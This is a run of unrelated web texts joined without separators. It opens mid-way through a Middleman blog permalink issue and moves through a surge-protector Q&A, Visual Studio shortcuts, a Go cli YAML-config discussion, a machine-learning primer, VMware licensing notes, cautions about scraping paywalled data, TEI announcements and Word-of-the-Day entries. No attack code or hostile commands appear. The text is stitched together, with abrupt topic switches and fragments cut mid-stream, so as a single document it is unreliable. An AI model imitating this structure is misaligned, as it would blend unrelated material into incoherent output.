description: "Let's see whether this works"
keywords: 'Vivere a Manchester, Trasferirsi a Manchester'
author: Andrea Moro
heading: Vivere a ... Londra
SearchFromSummary: true
---
```

Now, the logic would have suggested that blog.permalink = "{category}/:title" would result in the title from the front matter being used to construct the permalink. However, the title in the case of this project is always equal to the "filename" of the blog post without the date. In the case of the front matter above, that is "keepgoing". Hence my suggestion to rename the property/behaviour of the title into filename. Hope this makes more sense, or you can spot something wrong in what I did. Please note that I added the permalink data in the front matter only after I realised I couldn't get this done any better. Thanks Can you also add the versions of Middleman and Middleman Blog please.
Ok, getting to the bottom of this: Title is the correct name (and we won't be changing this). For instance, if you use the CLI command to create an article, then you reference the title in this command and it is applied to the filename for uniqueness: middleman article TITLE. If the title appears in the filename, then it takes precedence over the frontmatter and is applied to the metadata of the article. Now, for your scenario, you want this config:

```ruby
activate :blog do |blog|
  blog.sources = ":category/:year-:month-:day.html"
  blog.permalink = ":category/{title}.html"
end
```

Post frontmatter:

```yaml
---
title: "Newer Article 1"
date: 2011-01-01
---
```

Then the title becomes the slug for the permalink. This example means you need to rename your files. If you want an extra frontmatter field for, say, a title in the page, then create something like heading: "New custom page heading" and use this in the article loop. As also stated in the forum, consider the slug: custom-url-for-each-post. This way you get full manipulation of the URL you want per post, which is better for SEO also. Hi Ian, Thanks for looking into this, but those "permalink" configurations were already explored, and that's the reason I opened this issue. Please have a look at the new screenshot. As you can see, the title in the frontmatter is not used to build the permalink, and - assuming I understand you correctly - the filename "title" is not the same as the frontmatter title. And I don't understand in which other way a title could not appear in the filename itself. Can you please advise?
PC hardware--CPU & Motherboard & RAM/surge protector I wasn't sure what category this best fits, but here goes: When I'm not using my PC overnight or for long periods of time, is it best to shut off my surge protector (for my PC/monitor/printer), or doesn't it matter? Thanks, Robert Whether this is a good or bad idea depends on what your goal is. In terms of harming anything, there should be no risk, although the switch on the surge protector may wear out depending on how frequently it is actuated. It is a mechanical device, just like a light switch, so it can wear out with use. This is usually never a consideration for a surge protector or anything else that's rarely switched, but if you were doing this daily it may eventually become noticeable (we're likely talking over the course of many years). With the computer powered off but plugged in, it will draw very little power (in many cases under 5 W). However, if the system continues to provide power to USB ports while off (a feature on some newer machines), using the machine to charge devices or similar will increase that power consumption, and it is likely less efficient than using a stand-alone charger. It draws some power to maintain "standby" (this isn't the same as putting the computer into standby from within Windows), which is what allows it to turn on when buttons are pressed, and it also draws some power to maintain the real-time clock. With power disconnected from the wall, the machine will rely on an internal button cell battery. Generally those batteries last for years; however, if the battery were to fail, the machine would not have an accurate clock setting, and the CMOS will also clear. This will not damage anything, but it will throw an error on start-up (it will not prevent the machine from working in any way), and once the battery is replaced the system can rely on it again. These batteries are very easy and cheap to find, and generally easy to replace.
Of course, if/when the battery fails and the machine is plugged into AC power, you will likely still get a message about the dead battery, but as long as the AC power supply is maintained, the clock/CMOS will not be reset. Think of this battery as similar to the 9V battery that some alarm clocks use to maintain their time when unplugged or in the event of a power outage. For the other devices, however, there is likely no downside to having the AC power cut periodically. The exception here would be if your printer is elaborate/complex enough to have a clock or other such functionality, but simpler desktop printers likely do not. The same goes for your monitor. Cutting off the AC power will reduce power consumption from these devices when they are not in use, especially if the printer does not have a power-saving or "idle" mode. At most we're probably talking 20-30 W, but if your goal is to reduce power consumption, that's still something, and it's a very simple thing to do. There is a more convenient option than manually switching the power strip/surge protector, though: there are a variety of surge protectors that will automatically disconnect their outlets when a "control" device is detected as off. You could plug the computer itself into that "control" outlet, which would ensure that it gets 24x7 AC power for standby, its internal clock, and (if this is a feature your computer has) USB charging, but the outlets for the monitor, printer, etc. would be disconnected when the computer was not powered on, saving power. These kinds of surge protectors are usually marketed as "Green" or "Environmental" models, and aren't entirely uncommon or expensive. Here is an example device: You can also find things like these at hardware stores and some electronics or department stores. For extended periods of non-use (e.g. you're going on a two-week vacation), I would generally suggest physically unplugging the computer (and other devices, like your TV) from the outlet.
This not only will reduce power consumption while you're away, but can afford some protection from a power surge or other event for disconnected devices. If you have any further questions, feel free to ask.
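To put the savings in perspective, here is a quick back-of-the-envelope calculation, using the 20-30 W figure above and an assumed electricity price of $0.12/kWh (rates vary widely by region, so check your own bill):

```python
standby_watts = 25       # midpoint of the 20-30 W estimate above
hours_off_per_day = 16   # e.g. overnight plus the workday
price_per_kwh = 0.12     # assumed rate in $/kWh; adjust for your region

# Energy saved per year if those devices are fully cut off while unused
kwh_per_year = standby_watts * hours_off_per_day * 365 / 1000
cost_per_year = kwh_per_year * price_per_kwh

print(round(kwh_per_year, 1))   # 146.0 kWh
print(round(cost_per_year, 2))  # 17.52 dollars
```

Not a fortune, but for a one-time flip of a switch (or an auto-switching strip), it adds up across a household's devices.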
Visual Studio Shortcuts and Add-on Tools

This post from Premier Developer consultant Crystal Tenn walks you through customizing Visual Studio to work better for you and your organization. I like tools that make my development faster and more organized. The small amount of time it takes to invest in installing and learning these tools pays off in the long run! I have listed out the shortcuts that I use in my Visual Studio, and how to change your settings if you want to adopt some of my shortcuts or make up your own easy-to-remember ones. You can share settings across a team so that everyone is more productive and in sync. I like to change my new classes so that they are public by default; instructions are below. Also, I use add-ons to help check my spelling, so it is easy for others to find my work (it's hard for others to find my class if I spell it wrong), and I have listed a couple of options in this article. I did not go into this topic here as it is lengthy, but I also recommend using ReSharper, which has many tools to help you write code faster and more effectively! *As a note, all screenshots are taken with Visual Studio 2017.

How to edit Visual Studio Shortcuts:
- Click on Tools > Options
- Under Environment, go to Keyboard.

The highlighted section "Show commands containing:" corresponds to the "VS Mapping" column in the table that you will see next. If you press shortcut keys, you can assign a new shortcut to whichever command is selected. You can type in the shortcut keys to find out if the combination is currently used by anything by checking the box below (greyed out in the screenshot) that reads "Shortcut currently used by" - for example, if you need to find the name of a shortcut you use and you are not sure what it is called.
| Command | Shortcut | How to remember it |
| --- | --- | --- |
| **Project / Files / References** | | |
| Add a new class | Ctrl + N, Ctrl + C | N for New and C for Class |
| Add new Project | Ctrl + N, Ctrl + P | N for New and P for Project |
| Add existing Project | Ctrl + N, Ctrl + E | N for New and E for Existing |
| Set current project as startup | Ctrl + S, Ctrl + P | S for Set as Startup and P for Project |
| Add Reference to selected project | Ctrl + A, Ctrl + R | A for Add and R for Reference |
| Comment out code | Ctrl + K, Ctrl + C | |
| Comment in code | Ctrl + K, Ctrl + U | |
| Collapse all methods | Ctrl + M, Ctrl + O | |
| Collapse all code | Ctrl + M, Ctrl + L | |
| Uncollapse all code | Ctrl + M, Ctrl + P | |
| Rename | Ctrl + R, Ctrl + R | |
| Fix all code alignment | Ctrl + K, Ctrl + D | |
| XML doc comment | /// on the line above what you want to comment, then hit Enter | |
| Go to Declaration | | |
| Go to Implementation | Ctrl + F12 | |
| | Ctrl + T | ReSharper VS config default |
| Go to Solution Explorer | Ctrl + S, Ctrl + E | S for Solution and E for Explorer |
| Go to Team Explorer | Ctrl + T, Ctrl + E | T for Team and E for Explorer |
| Go to Test Explorer | Ctrl + U, Ctrl + T | U for Unit and T for Tests |
| Navigate backward | Ctrl + – | |
| Navigate forward | Ctrl + Shift + – | |

How to export Visual Studio Shortcuts:
- Click Tools > Import and Export Settings ...
- On the popup, choose Export selected environment settings and hit Next >
- To choose only the keyboard settings, UNCHECK all settings, then go under Options, go under Environment, and then CHECK Keyboard.

How to import Visual Studio Shortcuts:
- Go to the same menu from Tools > Import and Export Settings ...
- Choose Import selected environment settings, then hit Next >
- Select if you just want certain settings or all the settings; for Keyboard, go to the same mapping as the screenshot above in the previous set of instructions.
- Choose the .vssettings file you want to import and where you want it stored.
- Hit Finish

How to set new classes to be public by default:
- Go to one of these locations, depending on which version of VS you own.
- VS2015: C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\ItemTemplates\CSharp\Code\1033\Class
- VS2017 (RC): C:\Program Files (x86)\Microsoft Visual Studio\2017\Enterprise\Common7\IDE\ItemTemplates\CSharp\Code\1033\Class
- Edit the template and add the public keyword before class. Add any other changes you would like to a default class or its usings.

Code Commenting Tool: GhostDoc helps you fill in as much of your comments as possible ahead of time so that you can customize them a little bit more. It saves you time by putting in a default summary and all your parameters in plain English. *Note: the Pro/Enterprise editions come with free spell checking!
GhostDoc Community (free) for VS2017: https://marketplace.visualstudio.com/items?itemName=sergeb.GhostDoc
GhostDoc Pro/Enterprise/Community for VS2015: https://submain.com/download/ghostdoc/pro/
Cost of Pro/Enterprise editions: https://submain.com/order.aspx
Features for different editions: https://submain.com/products/ghostdoc.aspx#features
4-minute kick-starter tutorial: https://submain.com/ghostdoc/GettingStarted/

Spelling Check Tool: ReSpeller (free!) If you don't get GhostDoc's paid versions and you want free spelling tools, you can get ReSpeller from the folks at JetBrains who made ReSharper by downloading this:
Add ability to get global and command level variables from a yaml file? I worked on a tool that leverages the codegangsta cli library. As part of that work, I wrapped much of the cli to add the capability to get values from yaml files: one for the global parameters, one for the command parameters. By default there would be a global file called .test.config.yml that global parameters could be pulled from. The name of the file could be configurable. The precedence would be: a value specified on the command line has the highest precedence, followed by an env variable, followed by a value in the yaml file. Below is a pseudo design, as I'm just trying to get across the idea. For a command, add fields:

cli.Command
AllowFileInput string    // allows the command to accept input from a file
FileInputFlagName string // defaults to "load"

For Flag we can add the following field:

AllowFileInput // indicates that this flag value can be found in the file

The files I pulled from were yaml files. We also have a version flag built into the file as well, and when the file is loaded, if it doesn't meet a particular version, it will error. There are a couple of places where I can see this getting a little complicated, like pulling generic values; it could be tricky to map. I didn't support this, as we didn't need anything like that. I suppose on a first stab we can exclude pulling parameters like that. Would this be an interesting capability for me to create a pull request along those lines? It would take a little time, as I'd need to rework what I have into the internal code and rework the tests, of course. Just trying to give back to something I've used. Hi @ChrisPRobinson, thanks for bringing this up! There was a little discussion around this in #235. I think this functionality would be very useful and would be open to a pull request introducing it.
I think it would be nice to see it architected as add-on functionality if at all possible, rather than changing the existing interface. A half-baked idea may be to introduce a subpackage that defines another set of flags that wraps the existing flags (and still satisfies the interface) but sets the default value based on a passed-in configuration file, so that you could then do something like:

```go
config := cflag.NewProvider("somefile.yaml")
myCommand.Flags = []cli.Flag{cflag.IntFlag{Name: "foo", Value: 123, ConfigProvider: config}}
```

I think this approach would be more flexible (support could be added for INI, JSON, etc.). Cool, I'm glad people are interested in this functionality. The approach you outlined is interesting; I hadn't exactly thought of that. I was attempting to make a pull request and I came up with something slightly different. It's totally not ready, but here is what I had. I made a new interface called FlagApplyExtension:

```go
type FlagApplyExtension interface {
	ApplyContext(*FlagSetContext)
}

type FlagSetContext struct {
	set             *flag.FlagSet
	inputSourceData InputSourceFlagProviderData
}
```

I also made two other interfaces as well:

```go
type InputSourceFlagProvider interface {
	LoadFlag() Flag
	Data(c *Context) (InputSourceFlagProviderData, error)
}

type InputSourceFlagProviderData interface {
	IsFlagSpecified(name string) bool
	Int(name string) int
	Duration(name string) time.Duration
	Float64(name string) float64
	Bool(name string) bool
	BoolT(name string) bool
	String(name string) string
	StringSlice(name string) []string
	IntSlice(name string) []int
	Generic(name string) interface{}
}
```

The idea was to have a different implementation for the sourceProvider. It can be ini, yaml, whatever. I made a providerData implementation that can handle a map. Then I wrote a yaml data source implementation that would read the data in and be able to use the map data implementation. I tweaked the command execution ever so slightly to invoke the new interface if it existed, otherwise to use the existing one.
In the core, it would only look at the InputSource if it wasn't nil; otherwise all the code stayed the same. I set the sourceProvider on the Command itself. From there it would flow down to the flags. You would only indicate whether you wanted the flag to be read or not. Also, I would inject an input flag as well that could be used. I was just trying things out this way. If I were to follow what you are describing, I would also want to not have to specify the config provider for each flag, but rather have that at the command level. I would need to implement something for that too. Perhaps this is too much detail; probably the best thing is to just nail down the API that we want people to use and work from there. Oh, and I forgot to mention, I wanted the config file path to be parameterizable. In your example above you have to specify the file directly. I wanted one flag to be specified on the command itself that would be the connection parameter. In my sample I would create a default "load" flag. This parameter is used to load. This also changes how to initialize everything: you can't get a cli.Context to read the flag values until they have all been parsed. One last note: the design I made doesn't fully work yet, because you want to be able to get some of the values that were already parsed to figure out where the yaml/configuration file is. There has to be a first pass that parses all the values. Then afterwards the config file is parsed and values are overridden if they are empty or default values. +1 +1 One issue that you've touched on is the precedence of different configuration sources (command line vs yaml file, etc.). This gets pretty difficult to manage the more sources you add (e.g. think of adding environment variables to your new flag objects). I'm working on a project that addresses that issue (it sounds very similar to your original project.
Shameless plug: https://github.com/zpatrick/go-config), and I think a very flexible and useful feature that side projects like ours could use is the ability to set flag values after parsing in the "context" object. There's an old feature request at https://github.com/codegangsta/cli/pull/234 which tries to accomplish that. I don't see much movement on it, though. I think adding that feature in this MR will make it much more valuable. It opens the door for arbitrary flag providers, not just the ini, yaml, etc. that get built into this repository. @zpatrick Thanks for the link, I'll take a look at it. I'm working on a prototype that "gets things working"; not that I want that pushed in, just as a starting point. One of the difficulties I'm having is getting the precedence working correctly, at least in the order I'm interested in: first specified args, then env vars, then yaml, then defaults. In the work I've done, I think I have an idea on how I can make which value is chosen a more composable operation. Might be able to get something out this weekend. But it won't be the real thing, just an initial cut to make for more discussion. I'd like to alter some of the internals if I can; I think this might open customizations a bit more. https://github.com/ChrisPRobinson/cli/pull/1 - Need to do more work to make something workable along the lines that @jszwedko was talking about, though putting this out there to view. The next work I do, I'm going to take the cli.Context refactor I made and then make new flags in another package along the lines discussed above. I'm going to aim to make something a bit composable for how it gets the values. Another prototype implementation, tried to reduce the set of changes to core files: https://github.com/ChrisPRobinson/cli/pull/2/files Ok, after a bunch of experimentation, I've gone more the way that @jszwedko suggested in the first place. I forgot about the power of embedding a struct in an existing one.
It will also allow others to create input sources other than yaml. Defining the flags seems ok. https://github.com/ChrisPRobinson/cli/pull/3 Probably the easiest way to see how people would use it is to look at the tests: https://github.com/ChrisPRobinson/cli/pull/3/files#diff-bbc8ba4cb51df0fc39d93d43e810f54f I welcome any comments. I'll just start working on implementing the rest of the functionality and adding tests as well.

I've opened a pull request that adds this functionality. Still need to do work to get it to build correctly: https://github.com/codegangsta/cli/pull/306

Never actually closed this issue out. Thank you so much for the implementation @ChrisPRobinson!
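The precedence order being discussed (explicitly specified args, then env vars, then the yaml file, then defaults) is independent of the cli library itself. Here is a minimal, language-neutral sketch of that lookup order; all names are illustrative and not part of the library's API:

```python
# Layered flag-value resolution: explicit CLI args win, then environment
# variables, then values parsed from a config file, then defaults.
_MISSING = object()

def resolve(name, cli_args, env, config_file, defaults):
    """Return the first value found for `name`, in precedence order."""
    for source in (cli_args, env, config_file, defaults):
        value = source.get(name, _MISSING)
        if value is not _MISSING:
            return value
    raise KeyError(name)

# Example: "port" is set everywhere, "host" only in the config file.
cli_args = {"port": 9000}
env = {"port": 8080, "verbose": True}
config_file = {"port": 80, "host": "example.com"}
defaults = {"port": 80, "host": "localhost", "verbose": False}

print(resolve("port", cli_args, env, config_file, defaults))     # 9000
print(resolve("host", cli_args, env, config_file, defaults))     # example.com
print(resolve("verbose", cli_args, env, config_file, defaults))  # True
```

The sentinel `_MISSING` distinguishes "source doesn't define this flag" from legitimate falsy values like `False` or `0`, which is exactly the "is it empty or a default?" question raised in the thread.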
There is a revolution happening right now in computing. Computers are becoming capable of many tasks that were previously considered only achievable by humans. As an example, back around 2011, if you asked an expert if a computer could tell the difference between a picture of a cat and a dog, they would probably tell you that it’s a hard problem. They are both furry creatures of varying colors that can have pictures taken from so many angles and in so many ways. How could a computer possibly figure this out? Today, it’s safe to say that this problem has been solved. And a whole lot of other challenging problems have been solved along with it. The driving force behind these advancements is a field called machine learning. Machine learning is when a computer learns by example instead of by strict rules that have been programmed. Specifically, there are algorithms called neural networks, deep neural networks, or deep learning that have been making huge advancements in the field. Neural networks borrow some ideas from biology in an effort to mimic the way a human brain works. Deep neural networks and deep learning build on the basic neural network algorithms in a way that lets them learn higher-level concepts. Let’s look at one example called the ImageNet challenge. ImageNet is a collection of images that are all tagged with a word describing what is in the image. Every year there is a challenge where teams compete to have their computer programs recognize these images. In 2011, the error rate of the best program was about 26%. The way they score this is that out of many images, the computer has to guess what those images are from 1000 categories – various things like different dog breeds, plants and buildings. The computer has 5 guesses per image and if it can’t guess correctly, it is considered to have failed that image. In 2012, a deep learning approach was used for the first time to win the challenge. 
Since then, the error rate has been almost cut in half every year. At the time of this writing, the error rate is 3.08%. This looks even more impressive when you compare it to the human score for this challenge. One person tried to do the challenge himself so there would be a reference point for human performance; he got a 5.1% error rate. So it's safe to say that computers are now quite good at image recognition, something they have historically been bad at. Before getting to other examples and applications of neural nets, I'd like to explain a little about how the image recognition works. Machine learning differs from other ways of programming a computer because it learns from examples. Usually, when you program a computer, you give it exact rules to follow. As an example, if you want to make software to recognize an image of a tree, you could write a program that says, "If the image is green on top and brown on the bottom, then it's a tree." That fails pretty quickly though, with different kinds of trees, different lighting, and of course in the fall when leaves turn red. You can solve that by writing more rules about what makes a tree a tree, but you quickly realize you're fighting a losing battle. The machine learning approach is to show a computer program images of thousands or millions of trees, and have it learn the distinguishing patterns in those images automatically. More recently, many of the techniques that have been gaining traction are called "deep learning." Deep learning is machine learning, but instead of looking for simple patterns, it is able to look for patterns-of-patterns, or patterns-of-patterns-of-patterns, and so on. By doing that, a deep learning system can start to understand higher-level concepts. In the case of image recognition, it will start by recognizing simple patterns like edges. From there, it will look for patterns-of-patterns – things that you can make from the simple edges, like corners or circles.
From there, it can start recognizing higher-level concepts: if it sees a car, maybe it can start to put together the headlights or wheels from those edges and circles. And then finally, it can put all the patterns that make up car pieces into a whole car. Each one of these stages of finding patterns is called a "layer" of the neural network, and it's the fact that these systems use many layers that is the reason this is called "deep." The "learning" part of "deep learning" is because all of these patterns that the computer looks for are learned from examples, not from manually designed rules. Image recognition is just one example of how new machine learning techniques are changing what computers can do. Machine learning is generally good at problems where computers need to understand and/or predict real-world data that is not exact. Other examples are things like speech recognition and understanding natural language. There are limitless applications of this technology, and every industry on the planet will be affected by it if it hasn't been already. In some applications, it will be easy to tell that machine learning is being used. Voice recognition on your phone primarily uses machine learning. For other applications, it will be less obvious that machine learning is involved. Better image recognition can help in the process of understanding medical images. There are companies working on medical diagnosis using the same image recognition technologies that are winning the ImageNet challenge. My work uses deep learning to recognize images of text and translate them between different languages in real time on a phone. It shows that we can now take these neural networks and run them on phones, which are much less powerful than your typical desktop or cloud computers. Even though machine learning is the underlying technology, the user of the software doesn't necessarily know that. To them, it is an app that they can use to break down language barriers.
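The top-5 scoring rule described earlier (the computer gets 5 guesses per image, and an image counts against it only if none of the guesses match) is easy to state in code. This is an illustrative sketch with made-up data, not the official ImageNet evaluation script:

```python
def top5_error(predictions, labels):
    """predictions: one list of up to 5 guesses per image (most confident
    first); labels: the true category for each image. An image is an error
    when its true label is not among the model's 5 guesses."""
    misses = sum(1 for guesses, label in zip(predictions, labels)
                 if label not in guesses[:5])
    return misses / len(labels)

# Three toy images: the model's 2nd guess is right for the first, it misses
# the second entirely, and its 1st guess is right for the third.
preds = [["cat", "dog", "fox", "wolf", "lynx"],
         ["oak", "pine", "car", "bus", "train"],
         ["tabby", "siamese", "persian", "sphynx", "manx"]]
truth = ["dog", "maple", "tabby"]
print(top5_error(preds, truth))  # 1 miss out of 3 images
```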
Convolutional Neural Network (CNN): This type of neural network is very good at image recognition. The ImageNet challenge winners tend to use variations of this algorithm.

Long short-term memory (LSTM): This type of neural network is good at understanding or predicting sequences of data. Things like speech or natural language will often be handled by LSTMs.

Deep learning / deep neural networks: Usually when people talk about "deep" learning, they are talking about CNNs or LSTMs. These networks recognize patterns and then feed those patterns into another stage of the network that recognizes patterns of patterns. This process can be repeated many times to learn higher-level concepts.

In the past (80s / 90s), neural nets were hyped up and then didn't live up to the hype. This time things are different. Even if progress in the field were to stop this instant, the progress we have seen so far would still be quite significant and game-changing for many industries. But it's not stopping. Every month exciting new research is released that pushes the boundaries and has people rethinking what was considered cutting edge last month. The initial spark for this recent progress came primarily from computers getting faster and from access to more data. Now we are also seeing so much research effort directed at this problem that there are many significant algorithmic improvements happening. So let's look at each of these 3 things: performance, data, and algorithms.

1. Computer performance improvements overall have slowed a bit in recent years, but there are companies making hardware specifically designed for neural networks. So performance will continue to improve for neural networks, allowing for more capable machine learning systems and allowing complex applications to run on lower-power processors like those found in phones.

2. More and more things are going online around the world, and with that comes more data.
Data quantity, quality, and diversity will continue to improve. This data can then be used to train machine learning systems. 3. More attention is being paid to the field of machine learning, and with that, more research and investment is happening in companies in the space. There will continue to be algorithmic progress. Progress in machine learning is not slowing down. There are applications of this technology that will deeply affect every industry. This will be a revolution as big as, or bigger than, personal computers, the internet, or mobile phones. Machine learning is the next underlying technology.
Easy just got easier

Cloud computing offers undisputed benefits in terms of agility and cost-effectiveness, and VMware offers unparalleled ability to automate and manage workloads across different cloud infrastructures. VMware's vCloud Suite brings together VMware's vSphere hypervisor with vRealize Suite, their multi-vendor hybrid cloud management platform. With vCloud Suite, you can easily build and manage both vSphere-based private clouds and multi-vendor hybrid clouds. And now, VMware has made the licensing administration for both vCloud Suite and vRealize Suite 7.0 easier as well. VMware recently announced a new licensing model for vCloud Suite and vRealize Suite 7.0. It comes in the form of a Portable License Unit (PLU), replacing per-CPU and per-OSI licensing for volume license customers. For each vRealize Suite license bought, you can have either one vSphere CPU or 15 OSIs in a non-VMware cloud (AWS, vCloud Air, physical, etc.). The VMware vCloud Suite is simply an extension of the vRealize Suite, adding vSphere Enterprise Plus to the total license package. For complete details on the new PLU, check out VMware's recent white paper on this topic. Besides the licensing questions we receive at WWT, as a leader in the Cisco and VMware space, we are often asked how we can integrate the two solutions together to provide lifecycle management, performance monitoring and analytics from VMware's Cloud Management Platform (CMP) solution. Here's a quick list of some of the Cisco capabilities delivered from each of the major VMware products in the vRealize Suite.

VMware vRealize Automation
- Provides physical server provisioning to Cisco UCS hardware using UCS Manager
- Using the Cisco UCS plug-in for vRealize Orchestrator, customers gain more administrative control through blueprints that can manage BIOS settings of blades and manipulate service profiles in UCSM.
- Integrates with ACI core technology and can embrace NSX on top of ACI
- Creates orchestrator workflows to manage switches, routers and firewalls, and then publishes them as self-service catalog items in vRA

VMware vRealize Log Insight
- VMware vRealize Log Insight is a log analytics tool that supports over 2.5 TB of log data per day. Customers can quickly troubleshoot a problem by looking at the compute, network, storage, virtualization and application layers all at once.
- Did you know that if you are an existing vCenter customer, you now get a free vRLI 25-OSI license with each vCenter Standard license? That means your IT organization can start using this tool in the data center today. 25 OSIs is more than enough to cover vCS and 10 ESXi hosts while still allowing room for VMs, network switches, etc.
- Cisco UCS Content Pack for Log Insight
- Cisco Nexus Content Pack for Log Insight
- Cisco ASA Content Pack for Log Insight
- VCE Vision for Log Insight

VMware vRealize Operations
- Performance monitoring, capacity planning and optimization built for the enterprise, all in one tool. VMware vRealize Operations can integrate with a variety of third-party products, including public clouds like VMware vCloud Air and AWS.
- Cisco UCS Management Pack from Blue Medora
- Cisco Nexus Management Pack from Blue Medora
- FlexPod Management Pack from Blue Medora
- VCE Vision Management Pack
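As a quick sanity check on the PLU arithmetic described earlier (one Portable License Unit covers either one vSphere CPU or 15 OSIs in a non-VMware cloud), here is a hedged sketch of how you might size a license purchase. It assumes PLUs can be mixed across both uses and that partial OSI blocks round up to a whole unit; confirm the actual pooling rules against VMware's white paper:

```python
import math

def plu_count(vsphere_cpus, non_vmware_osis, osis_per_plu=15):
    """Estimate Portable License Units needed: one PLU per vSphere CPU,
    plus one PLU per block of `osis_per_plu` OSIs in a non-VMware cloud
    (rounded up). Sizing sketch only, not official licensing guidance."""
    return vsphere_cpus + math.ceil(non_vmware_osis / osis_per_plu)

# e.g. 10 vSphere CPUs plus 40 OSIs running on AWS:
print(plu_count(10, 40))  # 10 + ceil(40 / 15) = 13
```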
Someone recently approached me with a question about considerations for a team that was thinking about scraping a commercial web site for data that was behind a paywall. The development team was thinking in terms of something being technically feasible, but not necessarily about the broader implications. I wrote back and figured I'd put my thoughts up here. Standard disclaimer: I am not a lawyer.

- Legal: Most sources of data publish clear terms & conditions about access that prohibit web scraping. If it's commercial data, they see scraping as a business threat, because they often up-sell programmatic access to the data. Unless it's explicitly allowed (or not addressed, if you're comfortable in a grey area), you're asking for legal trouble. I worked for a company that protected data like this. They have a big legal dept for a reason.

- Detection: If someone doesn't want you to scrape them, chances are they have ways to detect that you're scraping them. Request logs and monitoring give spikes away. Without disguise (which is borderline unethical) and adherence to a lot of politeness (which would make most scraping jobs take forever), most sites will be able to tell that someone is scraping them, and then figure out who.

- Complexity: You might find that your target site actively obfuscates its pages (e.g. by moving HTML elements around, renaming things, etc.) to throw off web scrapers, which often rely on consistent output in order to do their job. They may also give you fake data once you're detected to be scraping.

- Blocking / Banning: Even if someone doesn't sue you, they might blanket-block your entire organization, meaning you might lose the legitimate access to data that you have because IPs, subnets, and other machines get banned. And if they know the org doing it, they may take additional steps to ban that org's IPs as a retaliatory measure.
Here's an article that warns businesses about the dangers of web scraping, in case you need to help them see it the way the target site might: https://blog.radware.com/security/2016/03/good-bad-and-ugly-web-scraping/

Here's a nice, succinct take on ethics in web scraping: https://towardsdatascience.com/ethics-in-web-scraping-b96b18136f01 The difference is that your target site likely doesn't fall into the "ethical site owner" category in this article, as they are going to protect the data as a source of their IP, and that data is not something they'd consider part of the open web (especially if it's behind a login screen, subscription, or portal of any kind).

In short, I would push back strongly on the practice unless someone can show you that:

- It is explicitly allowed via your subscription (e.g. you have paid access to the data)
- It is not disallowed under the terms & conditions (just paying for it doesn't mean you can use it however you want)
- It is not available as an up-sell on the subscription you already have
- (Ideally) The client's legal team has signed off on the activity.
- Your team has a set of guiding principles in place similar to the "ethical data scraping" article above, and plans to adhere to them.
- Your company's client team is comfortable with the level of risk to the account relationship.

I hope this helps if you're considering your options here – wishing you happy, and ethical, scraping!
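For teams that do get the green light, the "politeness" mentioned above has a concrete baseline: honor robots.txt and pace your requests. A minimal sketch using Python's standard library (the robots.txt content here is a made-up example, parsed from a string so nothing hits the network):

```python
import time
import urllib.robotparser

# In practice you would fetch https://example.com/robots.txt; parsing from
# a string keeps this sketch self-contained.
rp = urllib.robotparser.RobotFileParser()
rp.parse("""
User-agent: *
Disallow: /private/
Crawl-delay: 5
""".splitlines())

def polite_fetch_allowed(path, last_request_time, min_delay=5.0):
    """True only if robots.txt allows the path AND at least `min_delay`
    seconds have passed since our previous request."""
    if not rp.can_fetch("*", path):
        return False
    return (time.monotonic() - last_request_time) >= min_delay

print(rp.can_fetch("*", "/private/data.html"))  # disallowed by robots.txt
print(rp.can_fetch("*", "/public/index.html"))  # allowed
```

Note that none of this makes scraping legal; it only keeps you out of the obviously rude end of the spectrum the articles above describe.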
The 2.0.1 release of TEI P5 is a minor release fixing a number of bugs pointed out with the 2.0.0 release. The 2.0.0 release of TEI P5 was a major new release of the TEI P5 Guidelines, which introduces some significant new material as well as implementing an unusually large set of other changes and error corrections. Since the last release in March 2011, members of the TEI community have proposed over 60 feature requests and reported about the same number of errors; dealing with these has kept the TEI Council busy, and most of these tickets have now been closed. See further the release notes http://www.tei-c.org/release/doc/tei-p5-doc/readme-2.0.1.html. This is a major new release of the P5 Guidelines, which introduces some significant new material as well as implementing an unusually large set of other changes and error corrections. Since the last release in March 2011, members of the TEI community have proposed over 60 feature requests and reported about the same number of errors; dealing with these has kept the TEI Council busy, and most of these tickets have now been closed. See further the release notes at http://www.tei-c.org/release/doc/tei-p5-doc/readme-2.0.html All, The TEI Projects page at http://www.tei-c.org/Activities/Projects/index.xml has been gathering entries for quite a few years, and not surprisingly some of the information in the entries is obsolete or out of date. TEI Council has discussed migrating the information here to a more user-friendly database-like interface, but that may not happen for a while. In the meantime, I have just gone through the existing entries and fixed broken links. I am sure that other information (contact email, etc.) needs updating as well. If you are responsible for a project listed on that page and want to make any changes, could you please email the details to me? 
Also, you can submit new projects here: http://www.tei-c.org/Activities/Projects/newform.html Four projects on the list seem to be entirely missing from the Web. If anyone can provide me with working links to them, I will update the entries; otherwise I will remove them from the list in a week or so:

The Anglo-Saxon Poetry Project http://www.tei-c.org/Activities/Projects/an01.xml
The Cursus Project http://www.tei-c.org/Activities/Projects/cu01.xml
Project Lorelei http://www.tei-c.org/Activities/Projects/lo01.xml
The Sternberg Project http://www.tei-c.org/Activities/Projects/st01.xml

Thanks for assistance, David Sewell, email@example.com TEI webmaster

TEI Community Initiative Grants
Proposals Due 15 December 2011
Total Call: $4,000

The TEI Board is delighted to announce a call for Community Initiative Grants. Proposed projects should support and promote the goals of the TEI and should be carried out within one year of the date of the award. Applications will be adjudicated according to the following criteria:

* excellence of the proposal;
* contribution of the activity to the promotion and development of the TEI;
* track record of the individuals or group proposing the activity;
* deliverables which are realistic and can be accomplished within the budget and time period proposed.

Although there is no upper limit for any individual proposal, applicants should bear in mind that the total amount for this grant call is $4,000. Proposals should be no longer than three pages (ca. 750 words) and should contain the following information:

1. Name and contact details of proposer
2. Name of organisation (if the proposal is being submitted on behalf of a TEI SIG or other organisation)
3. Narrative addressing the criteria above.
4. Amount requested. Please indicate if it would be possible to carry out the activity with less funding, and if so, how that would change the nature of the proposal.
5.
Date for final report Please send submissions to Susan Schreibman by 15 December 2011 -- Susan Schreibman, PhD Long Room Hub Senior Lecturer in Digital Humanities School of English Trinity College Dublin Dublin 2, Ireland email: firstname.lastname@example.org phone: +353 1 896 3694 fax: +353 1 671 7114 check out the new MPhil in Digital Humanities at TCD http://www.tcd.ie/English/postgraduate/digital-humanities/
Message the mods with word suggestions at /r/WordOfTheDay! Don't forget to check out /r/phraseoftheday!

29th May, 2020 - xeric - characterized by, relating to, or requiring only a small amount of moisture; compare hydric, mesic (self.WordOfTheDay) submitted 3 days ago by lowlevelbassMedius Mod
28th May, 2020 - acumen - keenness and depth of perception, discernment, or discrimination, especially in practical matters (self.WordOfTheDay) submitted 4 days ago by lowlevelbassMedius Mod
